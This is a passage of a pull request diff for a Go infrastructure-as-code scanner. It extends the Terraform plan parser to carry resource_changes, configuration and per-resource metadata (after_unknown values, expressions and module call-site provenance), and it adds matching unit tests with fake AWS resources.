### PR TITLE
Surface resource_changes/configuration in tfplan documents and resolve pattern filters

### DIFF
--- a/pkg/parser/json/tfplan.go
+++ b/pkg/parser/json/tfplan.go
@@ -8,8 +8,11 @@ package json
 import (
 	"encoding/json"
 	"fmt"
+	"strings"
 
 	"github.com/DataDog/datadog-iac-scanner/pkg/model"
+	"github.com/hashicorp/hcl/v2"
+	"github.com/hashicorp/hcl/v2/hclsyntax"
 	hcl_plan "github.com/hashicorp/terraform-json"
 	"github.com/tidwall/gjson"
 )
@@ -17,49 +20,326 @@ import (
 // TFPlan is an auxiliary structure for parsing tfplans as a scanner Document
 type TFPlan struct {
 	Resource map[string]TFPlanResource `json:"resource"`
+
+	ResourceChanges any `json:"resource_changes,omitempty"`
+	Configuration   any `json:"configuration,omitempty"`
+
+	// TfplanMeta is a reserved top-level map, parallel to Resource (not
+	// nested inside it), keyed exactly like Resource[type][flattened-key].
+	TfplanMeta map[string]map[string]tfplanResourceMeta `json:"_dd_tfplan_meta,omitempty"`
 }
 
-// TFPlanResource is an auxiliary structure for parsing tfplans as a scanner Document.
-// Values are either a TFPlanNamedResource (keyed by resource name) or, under the
-// reserved "_dd_lines" key, a map[string]*model.LineObject holding each sibling
-// resource's header line (see readModule).
+// TFPlanResource is keyed by resource name, plus a reserved "_dd_lines" key
+// holding each resource's header line (see readModule).
 type TFPlanResource map[string]any
 
-// TFPlanNamedResource is an auxiliary structure for parsing tfplans as a scanner Document
 type TFPlanNamedResource map[string]any
 
-// parseTFPlan unmarshals Document as a plan so it can be rebuilt with only
-// the required information
+// tfplanResourceMeta is the payload stored under
+// _dd_tfplan_meta.<type>.<flattened-key>.
+type tfplanResourceMeta struct {
+	Address                  string `json:"address"`
+	AfterUnknown             any    `json:"after_unknown,omitempty"`
+	ConfigurationExpressions any    `json:"configuration_expressions,omitempty"`
+	Provisioners             any    `json:"provisioners,omitempty"`
+}
+
+type resourceChangeCorrelation struct {
+	afterUnknownByAddress map[string]any
+	expressionsByAddress  map[string]any
+	provisionersByAddress map[string]any
+}
+
+func buildResourceChangeCorrelation(rawPlan []byte) resourceChangeCorrelation {
+	c := resourceChangeCorrelation{
+		afterUnknownByAddress: make(map[string]any),
+		expressionsByAddress:  make(map[string]any),
+		provisionersByAddress: make(map[string]any),
+	}
+
+	gjson.GetBytes(rawPlan, "resource_changes").ForEach(func(_, change gjson.Result) bool {
+		address := change.Get("address").String()
+		if address == "" {
+			return true
+		}
+		if afterUnknown := change.Get("change.after_unknown"); afterUnknown.Exists() {
+			c.afterUnknownByAddress[address] = afterUnknown.Value()
+		}
+		return true
+	})
+
+	rootConfigModule := gjson.GetBytes(rawPlan, "configuration.root_module")
+	walkConfigModule(&rootConfigModule, "", nil, &c)
+
+	return c
+}
+
+// callSiteIdentity is a call site's stable identity: the module_calls block
+// and argument name it was declared at. expression itself isn't part of the
+// identity since a decoded JSON value (a map or slice) isn't comparable.
+type callSiteIdentity struct {
+	moduleAddress string
+	argumentName  string
+}
+
+// callSiteRecord is one entry in a call_site_expressions chain.
+type callSiteRecord struct {
+	callSiteIdentity
+	expression any
+}
+
+// callArgument is a call-site expression, never asserted as a resolved
+// value (Terraform serializes var.x and base64encode(var.x) alike).
+type callArgument struct {
+	callSiteIdentity
+	raw   gjson.Result
+	chain []callSiteRecord
+}
+
+// record returns arg's own call site as a callSiteRecord.
+func (arg *callArgument) record() callSiteRecord {
+	return callSiteRecord{callSiteIdentity: arg.callSiteIdentity, expression: arg.raw.Value()}
+}
+
+// walkConfigModule indexes each resource's expressions/provisioners by
+// absolute address, using callArgs to attach call-site provenance.
+func walkConfigModule(module *gjson.Result, modulePath string, callArgs map[string]callArgument, c *resourceChangeCorrelation) {
+	module.Get("resources").ForEach(func(_, resource gjson.Result) bool {
+		relativeAddress := resource.Get("address").String()
+		if relativeAddress == "" {
+			return true
+		}
+		absoluteAddress := relativeAddress
+		if modulePath != "" {
+			absoluteAddress = modulePath + "." + relativeAddress
+		}
+		if expressions := resource.Get("expressions"); expressions.Exists() {
+			c.expressionsByAddress[absoluteAddress] = qualifyExpressionTree(&expressions, callArgs)
+		}
+		if provisioners := resource.Get("provisioners"); provisioners.Exists() {
+			c.provisionersByAddress[absoluteAddress] = qualifyExpressionTree(&provisioners, callArgs)
+		}
+		return true
+	})
+
+	module.Get("module_calls").ForEach(func(callName, call gjson.Result) bool {
+		childModule := call.Get("module")
+		if !childModule.Exists() {
+			return true
+		}
+		childPath := "module." + callName.String()
+		if modulePath != "" {
+			childPath = modulePath + "." + childPath
+		}
+		childArgs := make(map[string]callArgument)
+		call.Get("expressions").ForEach(func(argName, argExpr gjson.Result) bool {
+			// Resolve this call's own args against the parent so a chain of
+			// var.x indirections resolves transitively, not just one hop.
+			childArgs[argName.String()] = callArgument{
+				callSiteIdentity: callSiteIdentity{moduleAddress: modulePath, argumentName: argName.String()},
+				raw:              argExpr,
+				chain:            callArgumentChain(&argExpr, callArgs),
+			}
+			return true
+		})
+		walkConfigModule(&childModule, childPath, childArgs, c)
+		return true
+	})
+}
+
+// qualifyExpressionTree walks an expressions/provisioners tree, attaching
+// call-site provenance to reference leaves without modifying any field.
+func qualifyExpressionTree(value *gjson.Result, callArgs map[string]callArgument) any {
+	if len(callArgs) == 0 || !value.IsObject() && !value.IsArray() {
+		return value.Value()
+	}
+
+	if value.Get("references").Exists() {
+		return attachCallSiteExpressions(value, callArgs)
+	}
+
+	if value.IsArray() {
+		items := value.Array()
+		resolved := make([]any, len(items))
+		for i, item := range items {
+			resolved[i] = qualifyExpressionTree(&item, callArgs)
+		}
+		return resolved
+	}
+
+	resolved := make(map[string]any)
+	value.ForEach(func(key, item gjson.Result) bool {
+		resolved[key.String()] = qualifyExpressionTree(&item, callArgs)
+		return true
+	})
+	return resolved
+}
+
+// attachCallSiteExpressions adds a "call_site_expressions" sidecar listing
+// each matched var.<name> reference's call-site chain, never modifying expr.
+func attachCallSiteExpressions(expr *gjson.Result, callArgs map[string]callArgument) any {
+	chain := referencedArgumentChain(expr, callArgs)
+	if len(chain) == 0 {
+		return expr.Value()
+	}
+
+	value, ok := expr.Value().(map[string]any)
+	if !ok {
+		return expr.Value()
+	}
+	expressions := make([]any, len(chain))
+	for i, rec := range chain {
+		expressions[i] = rec.expression
+	}
+	value["call_site_expressions"] = expressions
+	return value
+}
+
+// callArgumentChain builds expr's own provenance for a child call to use.
+// Returns nil when callArgs is empty (see referencedArgumentChain).
+func callArgumentChain(expr *gjson.Result, callArgs map[string]callArgument) []callSiteRecord {
+	if len(callArgs) == 0 {
+		return nil
+	}
+	return referencedArgumentChain(expr, callArgs)
+}
+
+// referencedArgumentChain flattens every ancestor call site a var.<name>
+// reference resolves to, deduplicated by (module, argument) identity.
+func referencedArgumentChain(expr *gjson.Result, callArgs map[string]callArgument) []callSiteRecord {
+	refs := expr.Get("references")
+	if !refs.IsArray() || len(refs.Array()) == 0 {
+		return nil
+	}
+
+	rawRefs := make([]string, len(refs.Array()))
+	for i, ref := range refs.Array() {
+		rawRefs[i] = ref.String()
+	}
+
+	seen := make(map[callSiteIdentity]bool)
+	var chain []callSiteRecord
+	for i, ref := range refs.Array() {
+		name, ok := varReferenceName(ref.String())
+		if !ok {
+			continue
+		}
+		if hasMoreSpecificTraversal(rawRefs, i, name) {
+			continue
+		}
+		arg, ok := callArgs[name]
+		if !ok {
+			continue
+		}
+		chain = appendDedupRecord(chain, seen, arg.chain...)
+		chain = appendDedupRecord(chain, seen, arg.record())
+	}
+	return chain
+}
+
+// appendDedupRecord appends each of recs to chain, skipping any whose
+// identity is already in seen, and marks every appended identity as seen.
+func appendDedupRecord(chain []callSiteRecord, seen map[callSiteIdentity]bool, recs ...callSiteRecord) []callSiteRecord {
+	for _, rec := range recs {
+		if seen[rec.callSiteIdentity] {
+			continue
+		}
+		seen[rec.callSiteIdentity] = true
+		chain = append(chain, rec)
+	}
+	return chain
+}
+
+// hasMoreSpecificTraversal reports whether rawRefs also contains a
+// traversal into "var.<name>" (e.g. "var.settings.selected") at another index.
+func hasMoreSpecificTraversal(rawRefs []string, self int, name string) bool {
+	prefix := "var." + name
+	for i, ref := range rawRefs {
+		if i == self {
+			continue
+		}
+		if !strings.HasPrefix(ref, prefix) {
+			continue
+		}
+		rest := ref[len(prefix):]
+		if strings.HasPrefix(rest, ".") || strings.HasPrefix(rest, "[") {
+			return true
+		}
+	}
+	return false
+}
+
+// varReferenceName reports whether ref is exactly a bare "var.<name>" root
+// (not "var.settings.metric_name") and, if so, returns <name>.
+func varReferenceName(ref string) (string, bool) {
+	if !strings.HasPrefix(ref, "var.") {
+		return "", false
+	}
+	name := strings.TrimPrefix(ref, "var.")
+	if name == "" || strings.ContainsAny(name, ".[") {
+		return "", false
+	}
+	return name, true
+}
+
+// canonicalConfigAddress strips "[...]" instance-key suffixes, e.g.
+// "module.staging[\"prod\"].aws_instance.web[2]" -> "module.staging.aws_instance.web".
+func canonicalConfigAddress(address string) string {
+	traversal, diags := hclsyntax.ParseTraversalAbs([]byte(address), "", hcl.Pos{Line: 1, Column: 1})
+	if diags.HasErrors() {
+		return address
+	}
+
+	canonical := ""
+	for _, step := range traversal {
+		switch t := step.(type) {
+		case hcl.TraverseRoot:
+			canonical = t.Name
+		case hcl.TraverseAttr:
+			canonical += "." + t.Name
+		case hcl.TraverseIndex:
+		}
+	}
+	return canonical
+}
+
+func resourceMetaFor(address string, c *resourceChangeCorrelation) tfplanResourceMeta {
+	meta := tfplanResourceMeta{Address: address}
+	if afterUnknown, ok := c.afterUnknownByAddress[address]; ok {
+		meta.AfterUnknown = afterUnknown
+	}
+	configAddress := canonicalConfigAddress(address)
+	if expressions, ok := c.expressionsByAddress[configAddress]; ok {
+		meta.ConfigurationExpressions = expressions
+	}
+	if provisioners, ok := c.provisionersByAddress[configAddress]; ok {
+		meta.Provisioners = provisioners
+	}
+	return meta
+}
+
 func parseTFPlan(doc model.Document) (model.Document, error) {
 	var plan *hcl_plan.Plan
 	b, err := json.Marshal(doc)
 	if err != nil {
 		return model.Document{}, err
 	}
-	// Unmarshal our Document as a plan so we are able retrieve planned_values
-	// in a easier way
 	err = json.Unmarshal(b, &plan)
 	if err != nil {
-		// Consider as regular JSON and not tfplan
 		return model.Document{}, err
 	}
 
-	// hcl_plan.Plan is a typed struct so unmarshaling drops the injected
-	// _dd_lines keys along with each resource's "values" attribute line. Read
-	// those lines back out of the raw bytes (via gjson, keyed by resource
-	// address) before that information is lost.
+	// hcl_plan.Plan is typed and drops the injected _dd_lines keys, so read
+	// them back from the raw bytes before that information is lost.
 	resourceLines := extractResourceHeaderLines(b)
+	correlation := buildResourceChangeCorrelation(b)
 
-	parsedPlan := readPlan(plan, resourceLines)
+	parsedPlan := readPlan(plan, doc["resource_changes"], doc["configuration"], resourceLines, &correlation)
 	return parsedPlan, nil
 }
 
-// extractResourceHeaderLines walks the raw plan JSON and returns, for every
-// planned resource, the _dd_line of its "values" attribute (i.e. where the
-// resource's own attribute block starts), keyed by resource address. Array
-// elements don't carry their own _dd_lines sibling (see setSeqLines in
-// json_line.go) — that information lives positionally in the parent module's
-// "_dd_lines._dd_resources._dd_arr" instead.
+// extractResourceHeaderLines returns each resource's "values" attribute
+// line, keyed by resource address.
 func extractResourceHeaderLines(rawPlan []byte) map[string]int {
 	lines := make(map[string]int)
 	root_module := gjson.GetBytes(rawPlan, "planned_values.root_module")
@@ -85,13 +365,19 @@ func walkModule(module *gjson.Result, lines map[string]int) {
 	})
 }
 
-// readPlan extracts the information needed from a Terraform plan and converts it to a scanner Document
-func readPlan(plan *hcl_plan.Plan, resourceLines map[string]int) model.Document {
+func readPlan(
+	plan *hcl_plan.Plan,
+	resourceChanges, configuration any,
+	resourceLines map[string]int,
+	correlation *resourceChangeCorrelation,
+) model.Document {
 	kp := TFPlan{
-		Resource: make(map[string]TFPlanResource),
+		Resource:        make(map[string]TFPlanResource),
+		ResourceChanges: resourceChanges,
+		Configuration:   configuration,
 	}
 
-	kp.readModule(plan.PlannedValues.RootModule, "", resourceLines)
+	kp.readModule(plan.PlannedValues.RootModule, "", resourceLines, correlation)
 
 	doc := model.Document{}
 
@@ -107,40 +393,33 @@ func readPlan(plan *hcl_plan.Plan, resourceLines map[string]int) model.Document 
 	return doc
 }
 
-// readModule recursively processes a module and its children, accumulating
-// resources from every module into the same flat resource.<type>.<name> map
-// without losing data across modules. moduleAddress is the full address of
-// module (e.g. "module.staging"), or "" for the root module.
-func (kp *TFPlan) readModule(module *hcl_plan.StateModule, moduleAddress string, resourceLines map[string]int) {
-	// Process all resources in this module
+// readModule recursively accumulates resources from every module into the
+// same flat resource.<type>.<name> map. moduleAddress is "" for the root module.
+func (kp *TFPlan) readModule(
+	module *hcl_plan.StateModule,
+	moduleAddress string,
+	resourceLines map[string]int,
+	correlation *resourceChangeCorrelation,
+) {
 	for _, resource := range module.Resources {
-		// Ensure the resource type map exists - accumulate, don't reinitialize!
 		if kp.Resource[resource.Type] == nil {
 			kp.Resource[resource.Type] = make(TFPlanResource)
 		}
 		typeRes := kp.Resource[resource.Type]
 
-		// Root-module resources keep their plain name. Child-module resources
-		// get their module address prefixed, so same-type-same-name resources
-		// in different modules don't collide into one map entry (which would
-		// silently drop a resource from evaluation).
+		// Module-prefixed so same-type-same-name resources in different
+		// modules don't collide.
 		resourceKey := resource.Name
 		if moduleAddress != "" {
 			resourceKey = moduleAddress + "." + resource.Name
 		}
 
-		// Handle count and for_each: append the index to the resource key
-		// This ensures each instance gets a unique key
 		if resource.Index != nil {
 			resourceKey = formatResourceKeyWithIndex(resourceKey, resource.Index)
 		}
 
-		// Accumulate the resource into the existing type map
 		typeRes[resourceKey] = TFPlanNamedResource(resource.AttributeValues)
 
-		// Inject the resource's "values" attribute line as a sibling _dd_lines
-		// entry at resource.<type>._dd_lines._dd_<name>._dd_line, matching the
-		// gjson path GetLineBySearchLine builds for a bare resource searchKey.
 		if line, ok := resourceLines[resource.Address]; ok {
 			ddLines, isMap := typeRes["_dd_lines"].(map[string]*model.LineObject)
 			if !isMap {
@@ -149,33 +428,31 @@ func (kp *TFPlan) readModule(module *hcl_plan.StateModule, moduleAddress string,
 			}
 			ddLines["_dd_"+resourceKey] = &model.LineObject{Line: line}
 		}
+
+		if kp.TfplanMeta[resource.Type] == nil {
+			if kp.TfplanMeta == nil {
+				kp.TfplanMeta = make(map[string]map[string]tfplanResourceMeta)
+			}
+			kp.TfplanMeta[resource.Type] = make(map[string]tfplanResourceMeta)
+		}
+		kp.TfplanMeta[resource.Type][resourceKey] = resourceMetaFor(resource.Address, correlation)
 	}
 
-	// Recursively process child modules, accumulating into the same map
 	for _, childModule := range module.ChildModules {
-		kp.readModule(childModule, childModule.Address, resourceLines)
+		kp.readModule(childModule, childModule.Address, resourceLines, correlation)
 	}
 }
 
-// formatResourceKeyWithIndex formats a resource key to include count/for_each index
-// Examples:
-//   - count: "web" + 0 -> "web[0]"
-//   - count: "web" + 2 -> "web[2]"
-//   - for_each: "bucket" + "prod" -> "bucket[\"prod\"]"
-//   - for_each: "bucket" + "staging" -> "bucket[\"staging\"]"
-func formatResourceKeyWithIndex(baseName string, index interface{}) string {
+// formatResourceKeyWithIndex appends a count/for_each index, e.g. "web[0]" or "bucket[\"prod\"]".
+func formatResourceKeyWithIndex(baseName string, index any) string {
 	switch idx := index.(type) {
 	case float64:
-		// Count index (JSON numbers are float64)
 		return fmt.Sprintf("%s[%d]", baseName, int(idx))
 	case int:
-		// Count index (in case it's already an int)
 		return fmt.Sprintf("%s[%d]", baseName, idx)
 	case string:
-		// For_each index with string key
 		return fmt.Sprintf("%s[%q]", baseName, idx)
 	default:
-		// Fallback: just use the base name if we don't recognize the index type
 		return baseName
 	}
 }

--- a/pkg/parser/json/tfplan_test.go
+++ b/pkg/parser/json/tfplan_test.go
@@ -62,6 +62,137 @@ func TestJson_parseTFPlan(t *testing.T) {
 						},
 					},
 				},
+				"_dd_tfplan_meta": map[string]interface{}{
+					"fakewebservices_database": map[string]interface{}{
+						"prod_db": map[string]interface{}{
+							"address": "fakewebservices_database.prod_db",
+						},
+					},
+				},
+				"resource_changes": []interface{}{},
+				"configuration":    map[string]interface{}{},
+			},
+			wantErr: false,
+		},
+		{
+			name: "test - resource_changes and configuration pass through",
+			args: args{
+				doc: model.Document{
+					"format_version":    "1.2",
+					"terraform_version": "1.5.0",
+					"planned_values": map[string]interface{}{
+						"root_module": map[string]interface{}{
+							"resources": []map[string]interface{}{
+								{
+									"address": "aws_s3_bucket.main",
+									"mode":    "managed",
+									"type":    "aws_s3_bucket",
+									"name":    "main",
+									"values": map[string]interface{}{
+										"bucket": "main-bucket",
+									},
+								},
+							},
+						},
+					},
+					"resource_changes": []map[string]interface{}{
+						{
+							"address": "aws_s3_bucket.main",
+							"mode":    "managed",
+							"type":    "aws_s3_bucket",
+							"name":    "main",
+							"change": map[string]interface{}{
+								"actions": []string{"create"},
+								"before":  nil,
+								"after": map[string]interface{}{
+									"acl": "private",
+								},
+								"after_unknown": map[string]interface{}{
+									"bucket": true,
+									"id":     true,
+								},
+							},
+						},
+					},
+					"configuration": map[string]interface{}{
+						"root_module": map[string]interface{}{
+							"resources": []map[string]interface{}{
+								{
+									"address": "aws_s3_bucket.main",
+									"mode":    "managed",
+									"type":    "aws_s3_bucket",
+									"name":    "main",
+									"expressions": map[string]interface{}{
+										"bucket": map[string]interface{}{
+											"references": []string{"random_id.suffix"},
+										},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+			want: model.Document{
+				"resource": map[string]interface{}{
+					"aws_s3_bucket": map[string]interface{}{
+						"main": map[string]interface{}{
+							"bucket": "main-bucket",
+						},
+					},
+				},
+				"_dd_tfplan_meta": map[string]interface{}{
+					"aws_s3_bucket": map[string]interface{}{
+						"main": map[string]interface{}{
+							"address": "aws_s3_bucket.main",
+							"after_unknown": map[string]interface{}{
+								"bucket": true,
+								"id":     true,
+							},
+							"configuration_expressions": map[string]interface{}{
+								"bucket": map[string]interface{}{
+									"references": []interface{}{"random_id.suffix"},
+								},
+							},
+						},
+					},
+				},
+				"resource_changes": []interface{}{
+					map[string]interface{}{
+						"address": "aws_s3_bucket.main",
+						"mode":    "managed",
+						"type":    "aws_s3_bucket",
+						"name":    "main",
+						"change": map[string]interface{}{
+							"actions": []interface{}{"create"},
+							"before":  nil,
+							"after": map[string]interface{}{
+								"acl": "private",
+							},
+							"after_unknown": map[string]interface{}{
+								"bucket": true,
+								"id":     true,
+							},
+						},
+					},
+				},
+				"configuration": map[string]interface{}{
+					"root_module": map[string]interface{}{
+						"resources": []interface{}{
+							map[string]interface{}{
+								"address": "aws_s3_bucket.main",
+								"mode":    "managed",
+								"type":    "aws_s3_bucket",
+								"name":    "main",
+								"expressions": map[string]interface{}{
+									"bucket": map[string]interface{}{
+										"references": []interface{}{"random_id.suffix"},
+									},
+								},
+							},
+						},
+					},
+				},
 			},
 			wantErr: false,
 		},
@@ -145,6 +276,21 @@ func TestJson_parseTFPlan(t *testing.T) {
 						},
 					},
 				},
+				"_dd_tfplan_meta": map[string]interface{}{
+					"aws_s3_bucket": map[string]interface{}{
+						"main": map[string]interface{}{
+							"address": "aws_s3_bucket.main",
+						},
+						"module.storage.backup": map[string]interface{}{
+							"address": "module.storage.aws_s3_bucket.backup",
+						},
+					},
+					"aws_instance": map[string]interface{}{
+						"web": map[string]interface{}{
+							"address": "aws_instance.web",
+						},
+					},
+				},
 			},
 			wantErr: false,
 		},
@@ -193,8 +339,6 @@ func TestJson_parseTFPlan(t *testing.T) {
 					},
 				},
 			},
-			// Child-module resources are module-prefixed, so they no longer
-			// collide with the root-module resource of the same type+name.
 			want: model.Document{
 				"resource": map[string]interface{}{
 					"aws_instance": map[string]interface{}{
@@ -209,6 +353,16 @@ func TestJson_parseTFPlan(t *testing.T) {
 							"tags": map[string]interface{}{
 								"Environment": "staging",
 							},
+						},
+					},
+				},
+				"_dd_tfplan_meta": map[string]interface{}{
+					"aws_instance": map[string]interface{}{
+						"web": map[string]interface{}{
+							"address": "aws_instance.web",
+						},
+						"module.staging.web": map[string]interface{}{
+							"address": "module.staging.aws_instance.web",
 						},
 					},
 				},
@@ -288,6 +442,23 @@ func TestJson_parseTFPlan(t *testing.T) {
 						},
 					},
 				},
+				"_dd_tfplan_meta": map[string]interface{}{
+					"aws_vpc": map[string]interface{}{
+						"main": map[string]interface{}{
+							"address": "aws_vpc.main",
+						},
+					},
+					"aws_subnet": map[string]interface{}{
+						"module.networking.public": map[string]interface{}{
+							"address": "module.networking.aws_subnet.public",
+						},
+					},
+					"aws_security_group": map[string]interface{}{
+						"module.networking.module.security.web": map[string]interface{}{
+							"address": "module.networking.module.security.aws_security_group.web",
+						},
+					},
+				},
 			},
 			wantErr: false,
 		},
@@ -334,8 +505,7 @@ func TestJson_parseTFPlan(t *testing.T) {
 					},
 				},
 			},
-			// Distinct module-prefixed keys, so both remain visible.
-			want: model.Document{
+					want: model.Document{
 				"resource": map[string]interface{}{
 					"aws_s3_bucket": map[string]interface{}{
 						"module.app1.data": map[string]interface{}{
@@ -343,6 +513,16 @@ func TestJson_parseTFPlan(t *testing.T) {
 						},
 						"module.app2.data": map[string]interface{}{
 							"bucket": "app2-data",
+						},
+					},
+				},
+				"_dd_tfplan_meta": map[string]interface{}{
+					"aws_s3_bucket": map[string]interface{}{
+						"module.app1.data": map[string]interface{}{
+							"address": "module.app1.aws_s3_bucket.data",
+						},
+						"module.app2.data": map[string]interface{}{
+							"address": "module.app2.aws_s3_bucket.data",
 						},
 					},
 				},
@@ -431,6 +611,19 @@ func TestJson_parseTFPlan(t *testing.T) {
 						},
 					},
 				},
+				"_dd_tfplan_meta": map[string]interface{}{
+					"aws_instance": map[string]interface{}{
+						"web[0]": map[string]interface{}{
+							"address": "aws_instance.web[0]",
+						},
+						"web[1]": map[string]interface{}{
+							"address": "aws_instance.web[1]",
+						},
+						"web[2]": map[string]interface{}{
+							"address": "aws_instance.web[2]",
+						},
+					},
+				},
 			},
 			wantErr: false,
 		},
@@ -498,13 +691,23 @@ func TestJson_parseTFPlan(t *testing.T) {
 						},
 					},
 				},
+				"_dd_tfplan_meta": map[string]interface{}{
+					"aws_s3_bucket": map[string]interface{}{
+						"data[\"prod\"]": map[string]interface{}{
+							"address": "aws_s3_bucket.data[\"prod\"]",
+						},
+						"data[\"staging\"]": map[string]interface{}{
+							"address": "aws_s3_bucket.data[\"staging\"]",
+						},
+						"data[\"dev\"]": map[string]interface{}{
+							"address": "aws_s3_bucket.data[\"dev\"]",
+						},
+					},
+				},
 			},
 			wantErr: false,
 		},
 		{
-			// Mirrors what initializeJSONLine/setLineInfo injects: the resources
-			// array element's own line lives in the parent's
-			// "_dd_lines._dd_resources._dd_arr", not on the element itself.
 			name: "test - injects resource values line from _dd_lines",
 			args: args{
 				doc: model.Document{
@@ -553,6 +756,15 @@ func TestJson_parseTFPlan(t *testing.T) {
 						},
 					},
 				},
+				"_dd_tfplan_meta": map[string]any{
+					"fakewebservices_database": map[string]any{
+						"prod_db": map[string]any{
+							"address": "fakewebservices_database.prod_db",
+						},
+					},
+				},
+				"resource_changes": []any{},
+				"configuration":    map[string]any{},
 			},
 			wantErr: false,
 		},
@@ -569,4 +781,992 @@ func TestJson_parseTFPlan(t *testing.T) {
 			require.Equal(t, tt.want, got)
 		})
 	}
+}
+
+// TestJson_parseTFPlan_dd_tfplan_meta_correlation exercises _dd_tfplan_meta's
+// direct-lookup contract, including for_each keys with a dot, "]", or quote.
+func TestJson_parseTFPlan_dd_tfplan_meta_correlation(t *testing.T) {
+	doc := model.Document{
+		"format_version":    "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"resources": []map[string]interface{}{
+					{
+						"address": "aws_vpc.main",
+						"mode":    "managed",
+						"type":    "aws_vpc",
+						"name":    "main",
+						"values": map[string]interface{}{
+							"cidr_block": "10.0.0.0/16",
+						},
+					},
+					{
+						"address": "aws_instance.web[0]",
+						"mode":    "managed",
+						"type":    "aws_instance",
+						"name":    "web",
+						"index":   float64(0),
+						"values": map[string]interface{}{
+							"instance_type": "t2.micro",
+						},
+					},
+					{
+						"address": "aws_s3_bucket.data[\"prod\"]",
+						"mode":    "managed",
+						"type":    "aws_s3_bucket",
+						"name":    "data",
+						"index":   "prod",
+						"values": map[string]interface{}{
+							"bucket": "prod-data-bucket",
+						},
+					},
+					{
+						"address": "aws_s3_bucket.data[\"a.b\"]",
+						"mode":    "managed",
+						"type":    "aws_s3_bucket",
+						"name":    "data",
+						"index":   "a.b",
+						"values": map[string]interface{}{
+							"bucket": "dotted-key-bucket",
+						},
+					},
+					{
+						"address": "aws_s3_bucket.data[\"a]b\"]",
+						"mode":    "managed",
+						"type":    "aws_s3_bucket",
+						"name":    "data",
+						"index":   "a]b",
+						"values": map[string]interface{}{
+							"bucket": "bracket-key-bucket",
+						},
+					},
+					{
+						"address": "aws_s3_bucket.data[\"a\\\"b\"]",
+						"mode":    "managed",
+						"type":    "aws_s3_bucket",
+						"name":    "data",
+						"index":   "a\"b",
+						"values": map[string]interface{}{
+							"bucket": "quote-key-bucket",
+						},
+					},
+				},
+				"child_modules": []map[string]interface{}{
+					{
+						"address": "module.networking",
+						"resources": []map[string]interface{}{
+							{
+								"address": "module.networking.aws_subnet.public",
+								"mode":    "managed",
+								"type":    "aws_subnet",
+								"name":    "public",
+								"values": map[string]interface{}{
+									"cidr_block": "10.0.1.0/24",
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+		"resource_changes": []map[string]interface{}{
+			{
+				"address": "aws_vpc.main",
+				"change": map[string]interface{}{
+					"after_unknown": map[string]interface{}{"id": true},
+				},
+			},
+			{
+				"address": "aws_instance.web[0]",
+				"change": map[string]interface{}{
+					"after_unknown": map[string]interface{}{"arn": true},
+				},
+			},
+			{
+				"address": "aws_s3_bucket.data[\"prod\"]",
+				"change": map[string]interface{}{
+					"after_unknown": map[string]interface{}{"id": true},
+				},
+			},
+			{
+				"address": "aws_s3_bucket.data[\"a.b\"]",
+				"change": map[string]interface{}{
+					"after_unknown": map[string]interface{}{"id": true},
+				},
+			},
+			{
+				"address": "aws_s3_bucket.data[\"a]b\"]",
+				"change": map[string]interface{}{
+					"after_unknown": map[string]interface{}{"id": true},
+				},
+			},
+			{
+				"address": "aws_s3_bucket.data[\"a\\\"b\"]",
+				"change": map[string]interface{}{
+					"after_unknown": map[string]interface{}{"id": true},
+				},
+			},
+			{
+				"address": "module.networking.aws_subnet.public",
+				"change": map[string]interface{}{
+					"after_unknown": map[string]interface{}{"id": true},
+				},
+			},
+		},
+		"configuration": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"resources": []map[string]interface{}{
+					{
+						"address": "aws_vpc.main",
+						"expressions": map[string]interface{}{
+							"cidr_block": map[string]interface{}{"constant_value": "10.0.0.0/16"},
+						},
+					},
+					{
+						"address": "aws_instance.web",
+						"expressions": map[string]interface{}{
+							"instance_type": map[string]interface{}{"references": []string{"var.instance_type"}},
+						},
+					},
+					{
+						"address": "aws_s3_bucket.data",
+						"expressions": map[string]interface{}{
+							"bucket": map[string]interface{}{"references": []string{"var.bucket_name"}},
+						},
+					},
+				},
+				"module_calls": map[string]interface{}{
+					"networking": map[string]interface{}{
+						"module": map[string]interface{}{
+							"resources": []map[string]interface{}{
+								{
+									"address": "aws_subnet.public",
+									"expressions": map[string]interface{}{
+										"cidr_block": map[string]interface{}{"references": []string{"var.subnet_cidr"}},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	got, err := parseTFPlan(doc)
+	require.NoError(t, err)
+
+	meta := func(resourceType, key string) map[string]interface{} {
+		ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+		require.True(t, ok, "_dd_tfplan_meta not found")
+		typeMap, ok := ddMeta[resourceType].(map[string]interface{})
+		require.True(t, ok, "_dd_tfplan_meta.%s not found", resourceType)
+		entry, ok := typeMap[key].(map[string]interface{})
+		require.True(t, ok, "_dd_tfplan_meta.%s.%s not found", resourceType, key)
+		return entry
+	}
+
+	// _dd_tfplan_meta must never be nested inside resource.<type>.
+	resourceTypes, ok := got["resource"].(map[string]interface{})
+	require.True(t, ok)
+	for resourceType, typeMap := range resourceTypes {
+		asMap, ok := typeMap.(map[string]interface{})
+		require.True(t, ok)
+		require.NotContains(t, asMap, "_dd_tfplan_meta", "resource.%s must not contain _dd_tfplan_meta", resourceType)
+	}
+
+	require.Equal(t, map[string]interface{}{
+		"address":                   "aws_vpc.main",
+		"after_unknown":             map[string]interface{}{"id": true},
+		"configuration_expressions": map[string]interface{}{"cidr_block": map[string]interface{}{"constant_value": "10.0.0.0/16"}},
+	}, meta("aws_vpc", "main"))
+
+	require.Equal(t, map[string]interface{}{
+		"address":                   "aws_instance.web[0]",
+		"after_unknown":             map[string]interface{}{"arn": true},
+		"configuration_expressions": map[string]interface{}{"instance_type": map[string]interface{}{"references": []interface{}{"var.instance_type"}}},
+	}, meta("aws_instance", "web[0]"))
+
+	require.Equal(t, map[string]interface{}{
+		"address":                   "aws_s3_bucket.data[\"prod\"]",
+		"after_unknown":             map[string]interface{}{"id": true},
+		"configuration_expressions": map[string]interface{}{"bucket": map[string]interface{}{"references": []interface{}{"var.bucket_name"}}},
+	}, meta("aws_s3_bucket", "data[\"prod\"]"))
+
+	require.Equal(t, map[string]interface{}{
+		"address":                   "aws_s3_bucket.data[\"a.b\"]",
+		"after_unknown":             map[string]interface{}{"id": true},
+		"configuration_expressions": map[string]interface{}{"bucket": map[string]interface{}{"references": []interface{}{"var.bucket_name"}}},
+	}, meta("aws_s3_bucket", "data[\"a.b\"]"))
+
+	require.Equal(t, map[string]interface{}{
